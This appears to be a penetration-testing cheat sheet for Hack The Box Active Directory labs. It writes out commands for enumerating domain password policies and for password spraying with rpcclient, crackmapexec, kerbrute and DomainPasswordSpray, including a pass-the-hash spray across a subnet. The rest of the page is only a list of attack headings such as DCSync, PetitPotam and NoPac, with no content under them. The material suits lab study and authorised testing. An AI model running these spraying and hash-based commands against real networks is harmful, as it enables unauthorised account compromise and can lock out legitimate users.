Common Attacks
Enumerate Password Policy
#Enumerate Password policy
Intrusionz3r0X@htb[/htb]$ nxc smb 172.16.5.5 -u avazquez -p Password123 --pass-pol
Intrusionz3r0X@htb[/htb]$ enum4linux -P 172.16.5.5
Intrusionz3r0X@htb[/htb]$ enum4linux-ng -P 172.16.5.5 -oA ilfreight #Best Option
Intrusionz3r0X@htb[/htb]$ ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
#CMD
C:\htb> net accounts
#Powerview
PS C:\\htb> import-module .\\PowerView.ps1
PS C:\\htb> Get-DomainPolicyPassword Spraying
#Interal Password Spraying (Linux)
Intrusionz3r0X@htb[/htb]$ for u in $(cat valid_ad_users);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 172.16.5.5 -u valid_ad_users -p Password123 --continue-on-success
Intrusionz3r0X@htb[/htb]$ kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1
#Local admin Password Spraying
#Make sure **-local-auth** flag is set so we don't potentially lock out the built-in administrator for the domain
Intrusionz3r0X@htb[/htb]$ sudo crackmapexec smb **--local-auth** 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf --continue-on-success
#Internal Password Spraying - from Windows
PS C:\\htb> Import-Module .\\DomainPasswordSpray.ps1
PS C:\\htb> Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue
PS C:\\htb> Invoke-DomainPasswordSpray -UserList <users> -Domain <domain-name> -PasswordList <password> -OutFile sprayed-creds.txtRID Cycling Attack
DCSync Attack
Reversible Encryption Enabled
DNS Poisoning to Capture NTLMv2 Hashes

ExtraSids Attack (SID History Injection Attack)
Enumeration on Windows
Enumeration on Linux
Automatic via RaiseChild
Manual from Windows
Manual from Linux
New Windows Version
Printer Bug
MS14-068
Group Policy Preferences (GPP) Passwords
DNS Records When the naming convention is non-descriptive
NoPac (SamAccountName Spoofing)
PrinterNightmare
PetitPotam (MS-EFSRPC)
Shadow Credentials
Linux
Using Pywhister
Using Certipy-ad
Windows
GPO-Based Privilege Escalation to Domain Compromise

Pre-Windows 2000 computer account
LLMNR/NBT-NS Poisoning
Last updated
